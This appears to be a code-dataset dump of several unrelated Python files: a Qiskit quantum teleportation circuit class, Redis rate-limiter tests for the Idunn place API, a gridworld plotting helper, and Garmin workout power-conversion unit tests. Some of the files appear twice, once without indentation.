                self.circ.measure(3 * i + 2, 3 * self.nq - i - 1)
        return self.circ
class QT:
"""
Generate an instance of the Quantum Teleportation Protocol.
Attributes
----------
msg : List of Statevectors
The strand of 1-qubit state vectors that is intended to be sent
barriers : bool
Choice to include barriers in circuit or not
measure : bool
Choice to measure the teleported qubit at the end or not
qrname : string
Name of quantum registers
crname : string
Name of classical register holding all teleported bits
circ : QuantumCircuit
Qiskit QuantumCircuit that represents the circuit
"""
def __init__(self, msg=None, barriers=True, measure=True, qrname=None, crname=None):
if msg is None:
raise Exception('Provide list of Statevectors for the Teleportation circuit')
self.msg = msg
# Set flags for circuit generation
self.nq = len(msg)
self.barriers = barriers
self.measure = measure
# Set up the registers and the circuit
num_qr = 3*self.nq
num_cr = 2*self.nq
if qrname is None:
self.qr = QuantumRegister(num_qr, name="q")
else:
self.qr = QuantumRegister(num_qr, name=qrname)
self.circ = QuantumCircuit(self.qr)
self.cr = []
for i in range(num_cr):
self.cr.append(ClassicalRegister(1))
self.circ.add_register(self.cr[i])
if crname is None:
self.circ.add_register(ClassicalRegister(self.nq, name="output"))
else:
self.circ.add_register(ClassicalRegister(self.nq, name=crname))
def _create_bell_pair(self, a, b):
"""
Creates a bell pair
Inputs
------
a : int
Left most qubit position
b : int
Right most qubit position
"""
self.circ.h(a)
self.circ.cx(a, b)
def _bell_state_measurement(self, psi, a):
"""
Performs a bell state measurement using psi and a qubit indices
Inputs
------
psi : int
The index of the qubit that the messenger would like to send
a : int
The index of the qubit that is entangled with the receiver's
"""
self.circ.cx(psi, a)
self.circ.h(psi)
def _prepare_cbits(self, q1, q2, c1, c2):
"""
Measures qubits q1 & q2 on classical registers c1 & c2
Inputs
------
q1 : int
The index of one qubit to measure
q2 : int
The index of a second qubit to measure
c1 : int
The index of the classical register for q1
c2 : int
The index of the classical register for q2
"""
self.circ.measure(q1, c1)
self.circ.measure(q2, c2)
def _decode(self, qubit, c1, c2):
"""
Receiver applies gates depending on the classical bits received
Inputs
------
qubit : int
The index of the qubit that will receive the teleported qubit
c1 : ClassicalRegister
The first classical register to be read from
c2 : ClassicalRegister
The second classical register to be read from
"""
self.circ.x(qubit).c_if(c2, 1)
self.circ.z(qubit).c_if(c1, 1)
def gen_circuit(self):
"""
Create a circuit implementing the Quantum Teleportation protocol
Returns
-------
QuantumCircuit
QuatumCircuit object of size nq
"""
# Initialize the qubit to be teleported
# Create bell pairs
for i in range(self.nq):
self.circ.initialize(self.msg[i].data, 3*i)
self._create_bell_pair(3*i+1, 3*i+2)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# q1 is sent to messenger and q2 goes to receiver
# Messenger perform bell state measurements
for i in range(self.nq):
self._bell_state_measurement(3*i, 3*i+1)
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger prepares their classical bits to send
for i in range(self.nq):
self._prepare_cbits(3*i, 3*i+1, self.cr[2*i], self.cr[2*i+1])
if (self.barriers):
self.circ.barrier([3*i, 3*i+1, 3*i+2])
# Messenger sends resulting 2 classical bits to receiver
# Receiver applies certain gate(s) given classical bits' information
for i in range(self.nq):
self._decode(3*i+2, self.cr[2*i], self.cr[2*i+1])
# Receiver then measures (if the goal is for a product state)
if (self.measure):
for i in range(self.nq):
self.circ.measure(3*i+2, 3*self.nq-i-1)
return self.circ | 0.865437 | 0.730855 |
import responses
import pytest
import re
from freezegun import freeze_time
from app import app, settings
from fastapi.testclient import TestClient
from idunn.datasources.wikipedia import WikipediaSession
from idunn.utils.redis import RedisWrapper
from .utils import override_settings
from .test_api_with_wiki import mock_wikipedia_response
from .test_cache import has_wiki_desc
from redis import RedisError
from redis_rate_limit import RateLimiter
from functools import wraps
@pytest.fixture(scope="function")
def disable_redis():
    """Disable the RedisWrapper cache for one test, restoring it afterwards."""
    try:
        RedisWrapper.disable()
        yield
    finally:
        # Always re-enable, even if the test (or disable()) failed.
        RedisWrapper.enable()
@pytest.fixture(scope="function")
def limiter_test_normal(redis, disable_redis):
    """
    We define here settings specific to tests.
    We define low max calls limits to avoid
    too large number of requests made
    """
    with override_settings(
        # 6 Wikipedia calls per 5 s window; the redis fixture provides the URL.
        {"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 6, "REDIS_URL": redis}
    ):
        # To force settings overriding we need to set to None the limiter
        WikipediaSession.Helpers._rate_limiter = None
        yield
    # We reset the rate limiter to remove the context of previous test
    WikipediaSession.Helpers._rate_limiter = None
@pytest.fixture(scope="function")
def limiter_test_interruption(redis, disable_redis):
    """
    In the 'Redis interruption' test below
    we made more requests than the limits
    allowed by the fixture 'limiter_test_normal'
    So we need another specific fixture.
    """
    with override_settings(
        # High cap (100 calls / 5 s) so the interruption test never throttles.
        {"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 100, "REDIS_URL": redis}
    ):
        # Drop any limiter built with previous settings.
        WikipediaSession.Helpers._rate_limiter = None
        yield
    # Reset so the next test builds a fresh limiter.
    WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redis(limiter_test_normal, mock_wikipedia_response):
    """
    Check that Idunn stops querying Wikipedia once the rate limit is hit.

    Each place request (cache disabled) needs 2 Wikipedia calls to build the
    block (title translation + content fetch), and the fixture caps
    WIKI_API_RL_MAX_CALLS at 6: the first 3 responses carry the wiki block,
    the following ones do not.
    """
    client = TestClient(app)
    place_url = "http://localhost/v1/places/osm:relation:7515426?lang=es"
    for attempt in range(5):
        resp = client.get(url=place_url).json()
        if attempt < 3:
            # Still under the limit: the block is present.
            assert has_wiki_desc(resp)
        else:
            # Limit exhausted: the block is dropped.
            assert not has_wiki_desc(resp)
    # Exactly 6 upstream calls were made (2 per successful block).
    assert len(mock_wikipedia_response.calls) == 6
def test_rate_limiter_without_redis(disable_redis):
    """
    Test that Idunn doesn't stop external requests when no redis has been
    set: each of the 10 requests made to Idunn below reaches the mocked
    Wikipedia API (10 mocked calls are recorded in total, as asserted).
    """
    client = TestClient(app)
    with responses.RequestsMock() as rsps:
        # Catch-all mock for any Wikipedia host/path.
        rsps.add(
            "GET", re.compile(r"^https://.*\.wikipedia.org/"), status=200, json={"test": "test"}
        )
        for _ in range(10):
            client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
        assert len(rsps.calls) == 10
def restart_wiki_redis(docker_services):
    """
    Restart the 'wiki_redis' docker service and point Idunn at it again.

    Because docker services ports are
    dynamically chosen when the service starts
    we have to get the new port of the service.
    """
    docker_services.start("wiki_redis")
    # We have to remove the previous port of the redis service which has been
    # stored in the dict '_services' before to get the new one.
    del docker_services._services["wiki_redis"]
    port = docker_services.port_for("wiki_redis", 6379)
    url = f"{docker_services.docker_ip}:{port}"
    # Point the application settings at the restarted service...
    settings._settings["REDIS_URL"] = url
    # ...and drop the cached limiter so it is rebuilt with the new URL.
    WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redisError(
    limiter_test_interruption, mock_wikipedia_response, monkeypatch
):
    """
    Test that Idunn stops returning the wikipedia block
    when not enough space remains on the disk for the redis
    database used by the limiter.
    Also when the redis service comes back, Idunn should return
    the wikipedia block again.
    """
    client = TestClient(app)
    # First we make a successful call before "stopping" redis.
    response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
    assert response.status_code == 200
    resp = response.json()
    # Here the redis is on so the answer should contain the wikipedia block.
    assert has_wiki_desc(resp)
    with monkeypatch.context() as m:
        @wraps(RateLimiter.limit)
        def fake_limit(*args, **kwargs):
            """
            Raises a RedisError to simulate a lack of
            space on the disk
            """
            raise RedisError
        # Now we substitute the limit function with our fake_limit.
        m.setattr(RateLimiter, "limit", fake_limit)
        client = TestClient(app)
        response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
        assert response.status_code == 200
        resp = response.json()
        # No wikipedia block should be in the answer.
        assert not has_wiki_desc(resp)
    # Now that the redis "came back" (leaving the monkeypatch context
    # restored the real RateLimiter.limit), we are expecting a correct
    # answer from Idunn.
    response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
    assert response.status_code == 200
    resp = response.json()
    # Here the redis is on so the answer should contain the wikipedia block
    assert has_wiki_desc(resp)
@freeze_time("2018-06-14 8:30:00", tz_offset=2)
def test_rate_limiter_with_redis_interruption(
    docker_services, mock_wikipedia_response, limiter_test_interruption
):
    """
    Test that Idunn isn't impacted by any Redis interruption:
    If Redis service stops then the wikipedia block should not be returned.
    And when Redis restarts the wikipedia block should be returned again.

    Three steps:
    * A: redis is up: we have the wiki block
    * B: redis is down: no wiki block
    * C: redis is up again: we have the wiki block again
    """
    place_url = "http://localhost/v1/places/osm:relation:7515426?lang=es"
    # Wikipedia block expected in steps A and C.
    expected_wiki_block = {
        "type": "description",
        "description": "El Museo del Louvre es el museo nacional de Francia ...",
        "source": "wikipedia",
        "url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
    }

    def fetch_and_check_base_fields(client):
        # Request the place and assert every redis-independent field.
        response = client.get(url=place_url)
        assert response.status_code == 200
        resp = response.json()
        assert resp["id"] == "osm:relation:7515426"
        assert resp["name"] == "Museo del Louvre"
        assert resp["local_name"] == "Musée du Louvre"
        assert resp["class_name"] == "museum"
        assert resp["subclass_name"] == "museum"
        return resp

    client = TestClient(app)
    # A - Before the Redis interruption the wikipedia block is present.
    resp = fetch_and_check_base_fields(client)
    assert resp["blocks"][4] == expected_wiki_block
    # B - Stop the Redis service: the answer keeps all the base fields
    # but the wikipedia block disappears.
    docker_services._docker_compose.execute("stop", "wiki_redis")
    resp = fetch_and_check_base_fields(client)
    assert not has_wiki_desc(resp)
    # C - Once Redis restarts the wikipedia block is returned again.
    restart_wiki_redis(docker_services)
    resp = fetch_and_check_base_fields(client)
    assert resp["blocks"][4] == expected_wiki_block
import pytest
import re
from freezegun import freeze_time
from app import app, settings
from fastapi.testclient import TestClient
from idunn.datasources.wikipedia import WikipediaSession
from idunn.utils.redis import RedisWrapper
from .utils import override_settings
from .test_api_with_wiki import mock_wikipedia_response
from .test_cache import has_wiki_desc
from redis import RedisError
from redis_rate_limit import RateLimiter
from functools import wraps
@pytest.fixture(scope="function")
def disable_redis():
try:
RedisWrapper.disable()
yield
finally:
RedisWrapper.enable()
@pytest.fixture(scope="function")
def limiter_test_normal(redis, disable_redis):
"""
We define here settings specific to tests.
We define low max calls limits to avoid
too large number of requests made
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 6, "REDIS_URL": redis}
):
# To force settings overriding we need to set to None the limiter
WikipediaSession.Helpers._rate_limiter = None
yield
# We reset the rate limiter to remove the context of previous test
WikipediaSession.Helpers._rate_limiter = None
@pytest.fixture(scope="function")
def limiter_test_interruption(redis, disable_redis):
"""
In the 'Redis interruption' test below
we made more requests than the limits
allowed by the fixture 'limiter_test_normal'
So we need another specific fixture.
"""
with override_settings(
{"WIKI_API_RL_PERIOD": 5, "WIKI_API_RL_MAX_CALLS": 100, "REDIS_URL": redis}
):
WikipediaSession.Helpers._rate_limiter = None
yield
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redis(limiter_test_normal, mock_wikipedia_response):
"""
Test that Idunn stops external requests when
we are above the max rate
Each call to Idunn (with cache disabled) outputs a block with Wikipedia
data, which requires 2 requests to build (to translate the title and then to
fetch actual content).
As `WIKI_API_RL_MAX_CALLS` is set to 6, the blocks won't be displayed
after the 3rd request.
"""
client = TestClient(app)
for _ in range(3):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert has_wiki_desc(resp)
for _ in range(2):
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
resp = response.json()
assert not has_wiki_desc(resp)
assert len(mock_wikipedia_response.calls) == 6
def test_rate_limiter_without_redis(disable_redis):
"""
Test that Idunn doesn't stop external requests when
no redis has been set: 10 requests to Idunn should
generate 20 requests to Wikipedia API
"""
client = TestClient(app)
with responses.RequestsMock() as rsps:
rsps.add(
"GET", re.compile(r"^https://.*\.wikipedia.org/"), status=200, json={"test": "test"}
)
for _ in range(10):
client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert len(rsps.calls) == 10
def restart_wiki_redis(docker_services):
"""
Because docker services ports are
dynamically chosen when the service starts
we have to get the new port of the service.
"""
docker_services.start("wiki_redis")
# We have to remove the previous port of the redis service which has been
# stored in the dict '_services' before to get the new one.
del docker_services._services["wiki_redis"]
port = docker_services.port_for("wiki_redis", 6379)
url = f"{docker_services.docker_ip}:{port}"
settings._settings["REDIS_URL"] = url
WikipediaSession.Helpers._rate_limiter = None
def test_rate_limiter_with_redisError(
limiter_test_interruption, mock_wikipedia_response, monkeypatch
):
"""
Test that Idunn stops returning the wikipedia block
when not enough space remains on the disk for the redis
database used by the limiter.
Also when the redis service comes back, Idunn should returns
the wikipedia block again.
"""
client = TestClient(app)
# First we make a successful call before "stopping" redis.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block.
assert has_wiki_desc(resp)
with monkeypatch.context() as m:
@wraps(RateLimiter.limit)
def fake_limit(*args, **kwargs):
"""
Raises a RedisError to simulate a lack of
space on the disk
"""
raise RedisError
# Now we substitute the limit function with our fake_limit.
m.setattr(RateLimiter, "limit", fake_limit)
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# No wikipedia block should be in the answer.
assert not has_wiki_desc(resp)
# Now that the redis "came back", we are expecting a correct answer from
# Idunn.
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# Here the redis is on so the answer should contain the wikipedia block
assert has_wiki_desc(resp)
@freeze_time("2018-06-14 8:30:00", tz_offset=2)
def test_rate_limiter_with_redis_interruption(
docker_services, mock_wikipedia_response, limiter_test_interruption
):
"""
Test that Idunn isn't impacted by any Redis interruption:
If Redis service stops then the wikipedia block should not be returned.
And when Redis restarts the wikipedia block should be returned again
This test has 3 steps:
* A: redis is up: we have the wiki block
* B: redis is down: no wiki block
* C: redis is up again: we have the wiki block again
"""
client = TestClient(app)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
# A - Before Redis interruption we check the answer is correct
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
}
# B - We interrupt the Redis service and we make a new Idunn request
docker_services._docker_compose.execute("stop", "wiki_redis")
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
# The wikipedia block should not be returned: we check we have all the
# information, except the wikipedia block.
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert not has_wiki_desc(resp)
# C - When Redis service restarts the wikipedia block should be returned again.
restart_wiki_redis(docker_services)
response = client.get(url="http://localhost/v1/places/osm:relation:7515426?lang=es")
assert response.status_code == 200
resp = response.json()
assert resp["id"] == "osm:relation:7515426"
assert resp["name"] == "Museo del Louvre"
assert resp["local_name"] == "Musée du Louvre"
assert resp["class_name"] == "museum"
assert resp["subclass_name"] == "museum"
assert resp["blocks"][4] == {
"type": "description",
"description": "El Museo del Louvre es el museo nacional de Francia ...",
"source": "wikipedia",
"url": "https://es.wikipedia.org/wiki/Museo_del_Louvre",
} | 0.609524 | 0.406037 |
from .helper_utilities import unflatten_state
from .env import GridWorldMDP
import numpy as np
class GridWorldPlotter(object):
def __init__(self, grid_size, has_absorbing_state=True):
"""
Utility to plot gridworlds
:param grid_size: size of the gridworld
:param has_absorbing_state: boolean representing if the gridworld has an absorbing state
"""
if isinstance(grid_size, (GridWorldMDP,)):
raise TypeError('grid_size cannot be a GridWorldMDP. '
'To instantiate from GridWorldMDP use GridWorldPlotter.from_mdp()')
assert type(grid_size) is int, 'Gridworld size must be int'
self.size = grid_size
self.has_absorbing_state = has_absorbing_state
# TODO: store where the rewards are so we can plot them.
def _unflatten(self, onehot_state):
return unflatten_state(onehot_state, self.size, self.has_absorbing_state)
@staticmethod
def from_mdp(mdp):
# TODO: obtain reward specifications
if not isinstance(mdp, (GridWorldMDP,)):
raise TypeError('Only GridWorldMDPs can be used with GridWorldPlotters')
return GridWorldPlotter(mdp.size, mdp.has_absorbing_state)
def plot_grid(self, ax):
"""
Plots the skeleton of the grid world
:param ax:
:return:
"""
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid(False)
return ax
def plot_trajectories(self, ax, trajectories, dont_unflatten=False, jitter_scale=1):
"""
Plots a individual trajectory paths with some jitter.
:param ax: The axes to plot this on
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
for trajectory_unflattened in trajectories_unflat:
x, y = list(zip(*trajectory_unflattened))
x = np.array(x) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
y = np.array(y) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
ax.plot(x, y)
return ax
def plot_environment(self, ax, wall_locs=None, plot_grid=False):
"""
Plots the environment with walls.
:param ax: The axes to plot this on
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
# plot states with background color white
state_background = np.ones((self.size, self.size))
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.0 # R
wall_img[y_coord, x_coord, 1] = 0.0 # G
wall_img[y_coord, x_coord, 2] = 0.0 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_background, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
# Switch on flag if you want to plot grid
if plot_grid:
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
return ax, imshow_ax
def plot_heatmap(self, ax, trajectories, dont_unflatten=False, wall_locs=None):
"""
Plots a state-visitation heatmap with walls.
:param ax: The axes to plot this on.
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
state_visitations = np.zeros((self.size, self.size))
# plot actual state visitation heatmap
for trajectory in trajectories_unflat:
for state in trajectory:
x_coord =state[0]
y_coord = state[1]
state_visitations[y_coord, x_coord] += 1.
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
mid_visits = (np.max(state_visitations) - np.min(state_visitations)) / 2.
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.6 # R
wall_img[y_coord, x_coord, 1] = 0.4 # G
wall_img[y_coord, x_coord, 2] = 0.4 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_visitations, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
return ax, imshow_ax
def unflat_trajectories(self, trajectories):
"""
Returns a generator where the trajectories have been unflattened.
:param trajectories:
:return:
"""
return map(lambda traj: list(map(self._unflatten, traj)), trajectories) | emdp/gridworld/plotting.py | from .helper_utilities import unflatten_state
from .env import GridWorldMDP
import numpy as np
class GridWorldPlotter(object):
def __init__(self, grid_size, has_absorbing_state=True):
"""
Utility to plot gridworlds
:param grid_size: size of the gridworld
:param has_absorbing_state: boolean representing if the gridworld has an absorbing state
"""
if isinstance(grid_size, (GridWorldMDP,)):
raise TypeError('grid_size cannot be a GridWorldMDP. '
'To instantiate from GridWorldMDP use GridWorldPlotter.from_mdp()')
assert type(grid_size) is int, 'Gridworld size must be int'
self.size = grid_size
self.has_absorbing_state = has_absorbing_state
# TODO: store where the rewards are so we can plot them.
def _unflatten(self, onehot_state):
return unflatten_state(onehot_state, self.size, self.has_absorbing_state)
@staticmethod
def from_mdp(mdp):
# TODO: obtain reward specifications
if not isinstance(mdp, (GridWorldMDP,)):
raise TypeError('Only GridWorldMDPs can be used with GridWorldPlotters')
return GridWorldPlotter(mdp.size, mdp.has_absorbing_state)
def plot_grid(self, ax):
"""
Plots the skeleton of the grid world
:param ax:
:return:
"""
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.grid(False)
return ax
def plot_trajectories(self, ax, trajectories, dont_unflatten=False, jitter_scale=1):
"""
Plots a individual trajectory paths with some jitter.
:param ax: The axes to plot this on
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
for trajectory_unflattened in trajectories_unflat:
x, y = list(zip(*trajectory_unflattened))
x = np.array(x) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
y = np.array(y) + jitter_scale * np.random.rand(len(x)) / (2 * self.size)
ax.plot(x, y)
return ax
def plot_environment(self, ax, wall_locs=None, plot_grid=False):
"""
Plots the environment with walls.
:param ax: The axes to plot this on
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
# plot states with background color white
state_background = np.ones((self.size, self.size))
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.0 # R
wall_img[y_coord, x_coord, 1] = 0.0 # G
wall_img[y_coord, x_coord, 2] = 0.0 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_background, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
# Switch on flag if you want to plot grid
if plot_grid:
for i in range(self.size + 1):
ax.plot(np.arange(self.size + 1) - 0.5, np.ones(self.size + 1) * i - 0.5, color='k')
for i in range(self.size + 1):
ax.plot(np.ones(self.size + 1) * i - 0.5, np.arange(self.size + 1) - 0.5, color='k')
ax.set_xlabel('x')
ax.set_ylabel('y')
return ax, imshow_ax
def plot_heatmap(self, ax, trajectories, dont_unflatten=False, wall_locs=None):
"""
Plots a state-visitation heatmap with walls.
:param ax: The axes to plot this on.
:param trajectories: a list of trajectories. Each trajectory is a list of states (numpy arrays)
These states should be obtained by using the mdp.step() operation. To prevent
this automatic conversion use `dont_unflatten`
:param dont_unflatten: will not automatically unflatten the trajectories into (x,y) pairs.
(!) this assumes you have already unflattened them!
:param wall_locs: Locations of the walls for plotting them in a different color..
:return:
"""
if not dont_unflatten:
trajectories_unflat = list(self.unflat_trajectories(trajectories))
else:
trajectories_unflat = trajectories
state_visitations = np.zeros((self.size, self.size))
# plot actual state visitation heatmap
for trajectory in trajectories_unflat:
for state in trajectory:
x_coord =state[0]
y_coord = state[1]
state_visitations[y_coord, x_coord] += 1.
# plot walls in lame way -- set them to some hand-engineered color
wall_img = np.zeros((self.size, self.size, 4))
if wall_locs is not None:
mid_visits = (np.max(state_visitations) - np.min(state_visitations)) / 2.
for state in wall_locs:
y_coord = state[0]
x_coord = state[1]
wall_img[y_coord, x_coord, 0] = 0.6 # R
wall_img[y_coord, x_coord, 1] = 0.4 # G
wall_img[y_coord, x_coord, 2] = 0.4 # B
wall_img[y_coord, x_coord, 3] = 1.0 # alpha
# render heatmap and overlay the walls image
imshow_ax = ax.imshow(state_visitations, interpolation=None)
imshow_ax = ax.imshow(wall_img, interpolation=None)
ax.grid(False)
return ax, imshow_ax
def unflat_trajectories(self, trajectories):
"""
Returns a generator where the trajectories have been unflattened.
:param trajectories:
:return:
"""
return map(lambda traj: list(map(self._unflatten, traj)), trajectories) | 0.74826 | 0.663056 |
import unittest
from garminworkouts.models.power import Power
class PowerTestCase(unittest.TestCase):
def test_valid_power_to_watts_conversion(self):
ftp = 200
diff = 0
valid_powers = [
("0", 0),
("0%", 0),
("10", 20),
("10%", 20),
("100", 200),
("100%", 200),
("120", 240),
("120%", 240),
("150", 300),
("150%", 300),
("0W", 0),
("0w", 0),
("100W", 100),
("100w", 100),
("1000W", 1000),
("1000w", 1000)
]
for power, watts in valid_powers:
with self.subTest(msg="Expected %d watts for '%s' (ftp=%s, diff=%s)" % (watts, power, ftp, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_invalid_power_to_watts_conversion(self):
ftp = 200
diff = 0
invalid_powers = ["-1", "-1%", "2500", "2500%", "-1W", "5000W", "foo", "foo%", "fooW"]
for power in invalid_powers:
with self.subTest(msg="Expected ValueError for '%s" % power):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_diff(self):
power = "100"
ftp = 200
valid_diffs = [
(0.5, 300),
(0.05, 210),
(-0.05, 190),
(-0.5, 100)
]
for diff, watts in valid_diffs:
with self.subTest(msg="Expected %d watts for diff '%s' (power=%s, ftp=%s)" % (watts, diff, power, ftp)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_diff(self):
power = "100"
ftp = 200
invalid_diffs = [-1.0, 1.0, "foo"]
for diff in invalid_diffs:
with self.subTest(msg="Expected ValueError for '%s" % diff):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_ftp(self):
power = "50"
diff = 0
valid_ftps = [
(0, 0),
(100, 50),
(250, 125),
(999, 500)
]
for ftp, watts in valid_ftps:
with self.subTest(msg="Expected %d watts for ftp '%s' (power=%s, diff=%s)" % (watts, ftp, power, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_ftp(self):
power = "100"
diff = 0
invalid_ftps = [-1, 1000, "foo"]
for ftp in invalid_ftps:
with self.subTest(msg="Expected ValueError for '%s" % ftp):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
if __name__ == '__main__':
unittest.main() | tests/models/test_power.py | import unittest
from garminworkouts.models.power import Power
class PowerTestCase(unittest.TestCase):
def test_valid_power_to_watts_conversion(self):
ftp = 200
diff = 0
valid_powers = [
("0", 0),
("0%", 0),
("10", 20),
("10%", 20),
("100", 200),
("100%", 200),
("120", 240),
("120%", 240),
("150", 300),
("150%", 300),
("0W", 0),
("0w", 0),
("100W", 100),
("100w", 100),
("1000W", 1000),
("1000w", 1000)
]
for power, watts in valid_powers:
with self.subTest(msg="Expected %d watts for '%s' (ftp=%s, diff=%s)" % (watts, power, ftp, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_invalid_power_to_watts_conversion(self):
ftp = 200
diff = 0
invalid_powers = ["-1", "-1%", "2500", "2500%", "-1W", "5000W", "foo", "foo%", "fooW"]
for power in invalid_powers:
with self.subTest(msg="Expected ValueError for '%s" % power):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_diff(self):
power = "100"
ftp = 200
valid_diffs = [
(0.5, 300),
(0.05, 210),
(-0.05, 190),
(-0.5, 100)
]
for diff, watts in valid_diffs:
with self.subTest(msg="Expected %d watts for diff '%s' (power=%s, ftp=%s)" % (watts, diff, power, ftp)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
def test_power_to_watts_conversion_with_invalid_diff(self):
power = "100"
ftp = 200
invalid_diffs = [-1.0, 1.0, "foo"]
for diff in invalid_diffs:
with self.subTest(msg="Expected ValueError for '%s" % diff):
with self.assertRaises(ValueError):
Power(power).to_watts(ftp, diff)
def test_power_to_watts_conversion_with_valid_ftp(self):
power = "50"
diff = 0
valid_ftps = [
(0, 0),
(100, 50),
(250, 125),
(999, 500)
]
for ftp, watts in valid_ftps:
with self.subTest(msg="Expected %d watts for ftp '%s' (power=%s, diff=%s)" % (watts, ftp, power, diff)):
self.assertEqual(Power(power).to_watts(ftp, diff), watts)
